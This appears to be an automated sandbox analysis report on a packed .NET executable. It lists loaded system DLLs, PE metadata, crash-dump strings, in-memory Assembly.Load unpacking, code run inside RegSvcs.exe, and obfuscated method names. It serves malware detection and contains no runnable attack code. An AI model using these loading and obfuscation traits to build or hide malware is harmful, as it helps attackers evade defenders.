Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: moshost.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mapsbtsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mosstorage.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ztrace_maps.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ztrace_maps.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ztrace_maps.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mapconfiguration.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll

Source: C:\Users\user\Desktop\A2h6QhZIKx.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\A2h6QhZIKx.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: A2h6QhZIKx.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: A2h6QhZIKx.exe

Static file information: File size 1050112 > 1048576

Source: A2h6QhZIKx.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: A2h6QhZIKx.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: System.Configuration.pdb.> source: WER9E51.tmp.dmp.10.dr
Source:	Binary string: System.Xml.ni.pdb source: WER9E51.tmp.dmp.10.dr, WERB3ED.tmp.dmp.15.dr
Source:	Binary string: Accessibility.pdb source: WER9E51.tmp.dmp.10.dr, WERB3ED.tmp.dmp.15.dr
Source:	Binary string: System.ni.pdbRSDS source: WER9E51.tmp.dmp.10.dr, WERB3ED.tmp.dmp.15.dr
Source:	Binary string: System.Configuration.ni.pdb source: WER9E51.tmp.dmp.10.dr, WERB3ED.tmp.dmp.15.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER9E51.tmp.dmp.10.dr, WERB3ED.tmp.dmp.15.dr
Source:	Binary string: Accessibility.pdbMontero.dll" source: WERB3ED.tmp.dmp.15.dr
Source:	Binary string: System.Configuration.pdb source: WER9E51.tmp.dmp.10.dr, WERB3ED.tmp.dmp.15.dr
Source:	Binary string: uQFJ.pdbSHA256rQ source: A2h6QhZIKx.exe, lpIWQr.exe.0.dr, WER9E51.tmp.dmp.10.dr, WERB3ED.tmp.dmp.15.dr
Source:	Binary string: System.Xml.pdb source: WER9E51.tmp.dmp.10.dr, WERB3ED.tmp.dmp.15.dr
Source:	Binary string: System.pdb source: WER9E51.tmp.dmp.10.dr, WERB3ED.tmp.dmp.15.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER9E51.tmp.dmp.10.dr, WERB3ED.tmp.dmp.15.dr
Source:	Binary string: uQFJ.pdb source: A2h6QhZIKx.exe, lpIWQr.exe.0.dr, WER9E51.tmp.dmp.10.dr, WERB3ED.tmp.dmp.15.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER9E51.tmp.dmp.10.dr, WERB3ED.tmp.dmp.15.dr
Source:	Binary string: System.Core.ni.pdb source: WER9E51.tmp.dmp.10.dr, WERB3ED.tmp.dmp.15.dr
Source:	Binary string: System.Windows.Forms.pdb source: WER9E51.tmp.dmp.10.dr, WERB3ED.tmp.dmp.15.dr
Source:	Binary string: Microsoft.VisualBasic.pdbQ_ source: WERB3ED.tmp.dmp.15.dr
Source:	Binary string: mscorlib.pdb source: WER9E51.tmp.dmp.10.dr, WERB3ED.tmp.dmp.15.dr
Source:	Binary string: Microsoft.VisualBasic.pdbSystem.Configuration.dll source: WER9E51.tmp.dmp.10.dr
Source:	Binary string: System.Drawing.pdb source: WER9E51.tmp.dmp.10.dr, WERB3ED.tmp.dmp.15.dr
Source:	Binary string: mscorlib.ni.pdb source: WER9E51.tmp.dmp.10.dr, WERB3ED.tmp.dmp.15.dr
Source:	Binary string: System.pdb4 source: WER9E51.tmp.dmp.10.dr, WERB3ED.tmp.dmp.15.dr
Source:	Binary string: System.Core.pdb source: WER9E51.tmp.dmp.10.dr, WERB3ED.tmp.dmp.15.dr
Source:	Binary string: System.Drawing.pdbD source: WER9E51.tmp.dmp.10.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER9E51.tmp.dmp.10.dr, WERB3ED.tmp.dmp.15.dr
Source:	Binary string: System.Xml.pdb0_/s source: WERB3ED.tmp.dmp.15.dr
Source:	Binary string: System.ni.pdb source: WER9E51.tmp.dmp.10.dr, WERB3ED.tmp.dmp.15.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER9E51.tmp.dmp.10.dr, WERB3ED.tmp.dmp.15.dr

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.A2h6QhZIKx.exe.4f50000.4.raw.unpack, .cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.A2h6QhZIKx.exe.3901560.2.raw.unpack, axawa0e8J13q1G2Nlm.cs	.Net Code: S8SRgHg0MB System.Reflection.Assembly.Load(byte[])
Source: 0.2.A2h6QhZIKx.exe.27e4268.1.raw.unpack, .cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.A2h6QhZIKx.exe.51f0000.5.raw.unpack, axawa0e8J13q1G2Nlm.cs	.Net Code: S8SRgHg0MB System.Reflection.Assembly.Load(byte[])
Source: 0.2.A2h6QhZIKx.exe.38a1140.3.raw.unpack, axawa0e8J13q1G2Nlm.cs	.Net Code: S8SRgHg0MB System.Reflection.Assembly.Load(byte[])
Source: 0.2.A2h6QhZIKx.exe.275e7ac.0.raw.unpack, .cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 11.2.lpIWQr.exe.28a4284.0.raw.unpack, .cs	.Net Code: System.Reflection.Assembly.Load(byte[])

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 7_2_00417B1A LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,

7_2_00417B1A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0040D86E push 0040D89Ch; ret	7_2_0040D894
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0040D870 push 0040D89Ch; ret	7_2_0040D894
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_004140C0 push 004140ECh; ret	7_2_004140E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_004108C8 push 004108F4h; ret	7_2_004108EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0040B0F7 push 0040B124h; ret	7_2_0040B11C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0040B0F8 push 0040B124h; ret	7_2_0040B11C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00408080 push 004080B8h; ret	7_2_004080B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00408158 push 00408196h; ret	7_2_0040818E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00408970 push 004089E4h; ret	7_2_004089DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00408994 push 004089E4h; ret	7_2_004089DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_004089AC push 004089E4h; ret	7_2_004089DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00415208 push 0041528Ch; ret	7_2_00415284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0040CA0C push 0040CA3Ch; ret	7_2_0040CA34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0040CA10 push 0040CA3Ch; ret	7_2_0040CA34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00417AEC push 00417B18h; ret	7_2_00417B10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00404BC0 push 00404C11h; ret	7_2_00404C09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0040D3C0 push 0040D3ECh; ret	7_2_0040D3E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0040A3E4 push 0040A410h; ret	7_2_0040A408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0040C390 push 0040C3C0h; ret	7_2_0040C3B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0040C394 push 0040C3C0h; ret	7_2_0040C3B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0040A3AC push 0040A3D8h; ret	7_2_0040A3D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0040DC44 push 0040DCA3h; ret	7_2_0040DC9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0040DC0C push 0040DC38h; ret	7_2_0040DC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0040B41E push 0040B44Ch; ret	7_2_0040B444
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0040B420 push 0040B44Ch; ret	7_2_0040B444
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0040A438 push 0040A464h; ret	7_2_0040A45C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0041A4F4 push 0041A51Ah; ret	7_2_0041A512
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00414C80 push 00414CACh; ret	7_2_00414CA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00409488 push 004094B8h; ret	7_2_004094B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0041A4AC push 0041A4E8h; ret	7_2_0041A4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00418CB8 push 00418CE8h; ret	7_2_00418CE0

Source: A2h6QhZIKx.exe	Static PE information: section name: .text entropy: 7.0615722743167675
Source: lpIWQr.exe.0.dr	Static PE information: section name: .text entropy: 7.0615722743167675

Source: 0.2.A2h6QhZIKx.exe.3901560.2.raw.unpack, wnCD18BPY1ySBaFg0f.cs	High entropy of concatenated method names: 'uR5Js2AxCM', 'TTMJ8dQDI1', 'ToString', 'iD0Jl4m30Z', 'ccmJ32AcUU', 'wrHJqOi2vj', 'ShwJkirRfe', 'tNAJnHdg4G', 'cFxJ56RmQV', 'AOaJeiCNGE'
Source: 0.2.A2h6QhZIKx.exe.3901560.2.raw.unpack, KUbYdcz16KmiRRVpZI.cs	High entropy of concatenated method names: 'gC7rTLoUGM', 'uZbrocinWF', 'atIrf7ktaq', 'Yhwr7O4LYa', 'Si1rwsdJD3', 'UFdraDe7Vu', 'rVTrAqFTWR', 'pP8rZlfdxZ', 'MB0rVctP2L', 'aLEr41rMSu'
Source: 0.2.A2h6QhZIKx.exe.3901560.2.raw.unpack, dmuRry0R4f29ZyiNJV7.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'oPnbyvHwst', 'eVybrFQQwI', 'h3ebuUNeBU', 'pJcbbUbv1i', 'OHybMK7B2s', 'jxxbmjTiLx', 'Lp7bZet0wi'
Source: 0.2.A2h6QhZIKx.exe.3901560.2.raw.unpack, ct6L4ZfJAyd6tJsuDi.cs	High entropy of concatenated method names: 'KTRqXy0kcW', 'dBcqTDFXUI', 'n5Mqo36WFs', 'cutqfEi4qE', 'du2qIqyBZV', 'sSUq2Tylmm', 'VVeqJBUBA4', 'OTiqhg38jZ', 'o07qyJH1ic', 'xpFqreuNLP'
Source: 0.2.A2h6QhZIKx.exe.3901560.2.raw.unpack, THrO1aHPMk3ShbQscN.cs	High entropy of concatenated method names: 'IUSyIS6e9q', 'onByJYqj4H', 'oJvyyWKmDX', 'HbIyuyTGo5', 'BEEyMtwYMs', 'vUdyZna1Ft', 'Dispose', 'rR8hlC2yRE', 'ATph3DAOAb', 'mDghqlDcUS'
Source: 0.2.A2h6QhZIKx.exe.3901560.2.raw.unpack, LTMSRk7pAEQZ7FSNba.cs	High entropy of concatenated method names: 'eeBnpHAFQk', 'MoOn3UPx9p', 'lIXnkmAckw', 'gxLn5X5p5I', 'X40neZf0uf', 'TswkjrskYq', 'pJwkKQ6pme', 'vQukHPXlwP', 'RVikUQoHJM', 'lBAk60rQVq'
Source: 0.2.A2h6QhZIKx.exe.3901560.2.raw.unpack, EJSsDAPTcC8ha2Flt9.cs	High entropy of concatenated method names: 'VYDkSl7ETN', 'tAqk96jS7u', 'pB7qv6B4Vc', 'muRqaBt7qq', 'VbOqAl7MGo', 'K8oqxR3kfT', 'EDGqFAPMqX', 'qi4qWBsmlh', 'JjCqNhoLkA', 'sp5qtVABeN'
Source: 0.2.A2h6QhZIKx.exe.3901560.2.raw.unpack, tjBPX3OKayP28WKmQP.cs	High entropy of concatenated method names: 'uYcgA9BDR', 'uAeX1J8Mr', 'n6fT9iIJt', 'JZB99TPvx', 'TEAfB4935', 'na2PqNvrv', 'kY2egYCUw6Au0rrVZF', 'pUQlhmxVDDplgpjkSo', 'W7nhbNi9h', 'OqUrcPU3A'
Source: 0.2.A2h6QhZIKx.exe.3901560.2.raw.unpack, B6Oy4T0iPxqP5Qy22F9.cs	High entropy of concatenated method names: 'mRZuCmAUnF', 'QsouzUGXgS', 'wExb1Rd2O4', 'Yo67V3yidu8T7V4rZO0', 'dSA3J9yYoviMyZVJK4N', 'uRIrMOyTI40qUSV5iiu', 'JxfDqCyEjDGSq73Yn0a', 'LyZUl4yoHemFudPg2bN', 'JERynlyNjLOBLXWYmOi', 'xolcQXy7dQKVxxDYthS'
Source: 0.2.A2h6QhZIKx.exe.3901560.2.raw.unpack, F3nSH600wfw7ADp7v4w.cs	High entropy of concatenated method names: 'PurrCKSOC4', 'uQ5rzE3ebn', 'Pq9u1RjiD0', 'FNAu0TSa1V', 'kCjuOyEVeH', 'BW3uiGXVec', 'qg5uRAicjT', 'QOyupHcxNj', 'RsdulQyWCF', 'fFEu34gyoH'
Source: 0.2.A2h6QhZIKx.exe.3901560.2.raw.unpack, FhJ7UUCyJc9ayBfnHi.cs	High entropy of concatenated method names: 'SoKrqiUIMf', 'mG7rkdGtxT', 'WvprntnfXr', 'FRFr5ggHqt', 'L4GryTC2Bq', 'M6ureiI6k0', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.A2h6QhZIKx.exe.3901560.2.raw.unpack, bWqZSR6wJVeemCgk42.cs	High entropy of concatenated method names: 'gFCy7TTuNV', 'Eq9ywXRhoO', 'AoLyvq4Eab', 'rtuyaTTonT', 'SB4yAE1NPo', 'C2JyxcVY5i', 'gDayF27BgO', 'uIEyWMXbqg', 'eKeyNen9Xy', 'f1ayttRHBo'
Source: 0.2.A2h6QhZIKx.exe.3901560.2.raw.unpack, cKhAUwdPfOInnNbrT4.cs	High entropy of concatenated method names: 'Fx5DoXclfU', 'hrUDflCRVI', 'c9eD7mpUK0', 'QNXDwE8bVC', 'HhjDaO00gR', 'I4YDAoWB2R', 'E3qDF3UeKE', 'lC8DWkJroI', 'ILkDtT6R8Z', 'RuFDc4nGPQ'
Source: 0.2.A2h6QhZIKx.exe.3901560.2.raw.unpack, hiHYZDEx38O3c4V0Tx.cs	High entropy of concatenated method names: 'ToString', 'mqm2chLJwH', 'wOe2wtF5oW', 'UsK2v8bb1R', 'Slc2aUiY43', 'wYp2AxfBwM', 'HRr2xpooTb', 'u5W2FCbiT8', 'QXB2W4f4YN', 'qde2Nujhfc'
Source: 0.2.A2h6QhZIKx.exe.3901560.2.raw.unpack, W8OZKFKJReJpbCtRpp.cs	High entropy of concatenated method names: 'FeDJUERwZv', 'XlaJCSiuv5', 'MHxh1b9P4O', 'A8Uh0SjVkN', 'P15JcxbWMf', 'vHHJQKaOP9', 'KhuJdoZx0F', 'UW5JLfmQMq', 'rleJGYmxlN', 'OvaJEe3jVO'
Source: 0.2.A2h6QhZIKx.exe.3901560.2.raw.unpack, hucbFkLMtRp98Z8h5K.cs	High entropy of concatenated method names: 'EaHItdxC05', 'AZXIQYC8mG', 'oV3IL2hBfP', 'oKgIGSxyxg', 'RHXIw1JYt8', 'llsIvFx8Yi', 'xVuIao2Sk8', 'mnOIAMIC6B', 'KmYIxAjoMZ', 'HoDIFmYw1Z'
Source: 0.2.A2h6QhZIKx.exe.3901560.2.raw.unpack, OV8DiuNoXKJ1WB8qPq.cs	High entropy of concatenated method names: 'DL35V15Wek', 'cgr54M44DR', 'wFk5gf2K4V', 'alt5Xjbo1A', 'Gj95S3fhfo', 'rxF5TQD72e', 'gUw59Yy9jS', 'JHn5oe1N1l', 'JYM5f9PGGV', 'Jna5POKo98'
Source: 0.2.A2h6QhZIKx.exe.3901560.2.raw.unpack, XHI4wFo5Lxm6mj08UD.cs	High entropy of concatenated method names: 't6d3LND1sI', 'eh23GqEbEj', 'fFB3EnwgLE', 'J1x3BtrgKv', 'MR13j78E7Q', 'W0L3KBBFiu', 'WWs3HGgUdx', 'qXI3UJEAVF', 'Anh365YVuM', 'liF3CrRK38'
Source: 0.2.A2h6QhZIKx.exe.3901560.2.raw.unpack, axawa0e8J13q1G2Nlm.cs	High entropy of concatenated method names: 'CiDip15JnW', 'B4mil4ZfMT', 'qMNi30bBtY', 'yAXiqYpicF', 'PujikS4qMQ', 'Nirin931xt', 'EOTi5iJqPx', 'Clgie9xXYc', 'BpeiYacQO5', 'mbYisreu3T'
Source: 0.2.A2h6QhZIKx.exe.3901560.2.raw.unpack, ipJKph3hCPVZGq4cIy.cs	High entropy of concatenated method names: 'Dispose', 'i3S06hbQsc', 'oUNOwoupdE', 'LhhK37vI3H', 'MDl0CMrUA5', 'uDk0zed0Rw', 'ProcessDialogKey', 'WR0O1WqZSR', 'GJVO0eemCg', 'i42OOPhJ7U'
Source: 0.2.A2h6QhZIKx.exe.3901560.2.raw.unpack, S9rtuWRAkxKyMMtRDc.cs	High entropy of concatenated method names: 's3U05HI4wF', 'jLx0em6mj0', 'wJA0syd6tJ', 'luD08ifJSs', 'pFl0It9FTM', 'BRk02pAEQZ', 'TC9fJvql0uhRHvIb7d', 'N9txlwYT0OOCmuSghX', 'rfE00pDFqs', 'jAe0iSa7Sf'
Source: 0.2.A2h6QhZIKx.exe.3901560.2.raw.unpack, uPnEWS0O8I3FsUjr0J4.cs	High entropy of concatenated method names: 'ToString', 'xyCuoTGkDq', 'lEFufAB227', 'w9AuP2sqgS', 'sppu7pQ1hL', 'FyMuwpSie9', 'UIquv56De2', 'KyJuahdIo7', 'Sh3D7NyR2EUvOZI4lDp', 'AHmmMey891W6TXqxxr4'
Source: 0.2.A2h6QhZIKx.exe.51f0000.5.raw.unpack, wnCD18BPY1ySBaFg0f.cs	High entropy of concatenated method names: 'uR5Js2AxCM', 'TTMJ8dQDI1', 'ToString', 'iD0Jl4m30Z', 'ccmJ32AcUU', 'wrHJqOi2vj', 'ShwJkirRfe', 'tNAJnHdg4G', 'cFxJ56RmQV', 'AOaJeiCNGE'
Source: 0.2.A2h6QhZIKx.exe.51f0000.5.raw.unpack, KUbYdcz16KmiRRVpZI.cs	High entropy of concatenated method names: 'gC7rTLoUGM', 'uZbrocinWF', 'atIrf7ktaq', 'Yhwr7O4LYa', 'Si1rwsdJD3', 'UFdraDe7Vu', 'rVTrAqFTWR', 'pP8rZlfdxZ', 'MB0rVctP2L', 'aLEr41rMSu'
Source: 0.2.A2h6QhZIKx.exe.51f0000.5.raw.unpack, dmuRry0R4f29ZyiNJV7.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'oPnbyvHwst', 'eVybrFQQwI', 'h3ebuUNeBU', 'pJcbbUbv1i', 'OHybMK7B2s', 'jxxbmjTiLx', 'Lp7bZet0wi'
Source: 0.2.A2h6QhZIKx.exe.51f0000.5.raw.unpack, ct6L4ZfJAyd6tJsuDi.cs	High entropy of concatenated method names: 'KTRqXy0kcW', 'dBcqTDFXUI', 'n5Mqo36WFs', 'cutqfEi4qE', 'du2qIqyBZV', 'sSUq2Tylmm', 'VVeqJBUBA4', 'OTiqhg38jZ', 'o07qyJH1ic', 'xpFqreuNLP'
Source: 0.2.A2h6QhZIKx.exe.51f0000.5.raw.unpack, THrO1aHPMk3ShbQscN.cs	High entropy of concatenated method names: 'IUSyIS6e9q', 'onByJYqj4H', 'oJvyyWKmDX', 'HbIyuyTGo5', 'BEEyMtwYMs', 'vUdyZna1Ft', 'Dispose', 'rR8hlC2yRE', 'ATph3DAOAb', 'mDghqlDcUS'
Source: 0.2.A2h6QhZIKx.exe.51f0000.5.raw.unpack, LTMSRk7pAEQZ7FSNba.cs	High entropy of concatenated method names: 'eeBnpHAFQk', 'MoOn3UPx9p', 'lIXnkmAckw', 'gxLn5X5p5I', 'X40neZf0uf', 'TswkjrskYq', 'pJwkKQ6pme', 'vQukHPXlwP', 'RVikUQoHJM', 'lBAk60rQVq'
Source: 0.2.A2h6QhZIKx.exe.51f0000.5.raw.unpack, EJSsDAPTcC8ha2Flt9.cs	High entropy of concatenated method names: 'VYDkSl7ETN', 'tAqk96jS7u', 'pB7qv6B4Vc', 'muRqaBt7qq', 'VbOqAl7MGo', 'K8oqxR3kfT', 'EDGqFAPMqX', 'qi4qWBsmlh', 'JjCqNhoLkA', 'sp5qtVABeN'
Source: 0.2.A2h6QhZIKx.exe.51f0000.5.raw.unpack, tjBPX3OKayP28WKmQP.cs	High entropy of concatenated method names: 'uYcgA9BDR', 'uAeX1J8Mr', 'n6fT9iIJt', 'JZB99TPvx', 'TEAfB4935', 'na2PqNvrv', 'kY2egYCUw6Au0rrVZF', 'pUQlhmxVDDplgpjkSo', 'W7nhbNi9h', 'OqUrcPU3A'
Source: 0.2.A2h6QhZIKx.exe.51f0000.5.raw.unpack, B6Oy4T0iPxqP5Qy22F9.cs	High entropy of concatenated method names: 'mRZuCmAUnF', 'QsouzUGXgS', 'wExb1Rd2O4', 'Yo67V3yidu8T7V4rZO0', 'dSA3J9yYoviMyZVJK4N', 'uRIrMOyTI40qUSV5iiu', 'JxfDqCyEjDGSq73Yn0a', 'LyZUl4yoHemFudPg2bN', 'JERynlyNjLOBLXWYmOi', 'xolcQXy7dQKVxxDYthS'
Source: 0.2.A2h6QhZIKx.exe.51f0000.5.raw.unpack, F3nSH600wfw7ADp7v4w.cs	High entropy of concatenated method names: 'PurrCKSOC4', 'uQ5rzE3ebn', 'Pq9u1RjiD0', 'FNAu0TSa1V', 'kCjuOyEVeH', 'BW3uiGXVec', 'qg5uRAicjT', 'QOyupHcxNj', 'RsdulQyWCF', 'fFEu34gyoH'
Source: 0.2.A2h6QhZIKx.exe.51f0000.5.raw.unpack, FhJ7UUCyJc9ayBfnHi.cs	High entropy of concatenated method names: 'SoKrqiUIMf', 'mG7rkdGtxT', 'WvprntnfXr', 'FRFr5ggHqt', 'L4GryTC2Bq', 'M6ureiI6k0', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.A2h6QhZIKx.exe.51f0000.5.raw.unpack, bWqZSR6wJVeemCgk42.cs	High entropy of concatenated method names: 'gFCy7TTuNV', 'Eq9ywXRhoO', 'AoLyvq4Eab', 'rtuyaTTonT', 'SB4yAE1NPo', 'C2JyxcVY5i', 'gDayF27BgO', 'uIEyWMXbqg', 'eKeyNen9Xy', 'f1ayttRHBo'
Source: 0.2.A2h6QhZIKx.exe.51f0000.5.raw.unpack, cKhAUwdPfOInnNbrT4.cs	High entropy of concatenated method names: 'Fx5DoXclfU', 'hrUDflCRVI', 'c9eD7mpUK0', 'QNXDwE8bVC', 'HhjDaO00gR', 'I4YDAoWB2R', 'E3qDF3UeKE', 'lC8DWkJroI', 'ILkDtT6R8Z', 'RuFDc4nGPQ'
Source: 0.2.A2h6QhZIKx.exe.51f0000.5.raw.unpack, hiHYZDEx38O3c4V0Tx.cs	High entropy of concatenated method names: 'ToString', 'mqm2chLJwH', 'wOe2wtF5oW', 'UsK2v8bb1R', 'Slc2aUiY43', 'wYp2AxfBwM', 'HRr2xpooTb', 'u5W2FCbiT8', 'QXB2W4f4YN', 'qde2Nujhfc'
Source: 0.2.A2h6QhZIKx.exe.51f0000.5.raw.unpack, W8OZKFKJReJpbCtRpp.cs	High entropy of concatenated method names: 'FeDJUERwZv', 'XlaJCSiuv5', 'MHxh1b9P4O', 'A8Uh0SjVkN', 'P15JcxbWMf', 'vHHJQKaOP9', 'KhuJdoZx0F', 'UW5JLfmQMq', 'rleJGYmxlN', 'OvaJEe3jVO'
Source: 0.2.A2h6QhZIKx.exe.51f0000.5.raw.unpack, hucbFkLMtRp98Z8h5K.cs	High entropy of concatenated method names: 'EaHItdxC05', 'AZXIQYC8mG', 'oV3IL2hBfP', 'oKgIGSxyxg', 'RHXIw1JYt8', 'llsIvFx8Yi', 'xVuIao2Sk8', 'mnOIAMIC6B', 'KmYIxAjoMZ', 'HoDIFmYw1Z'
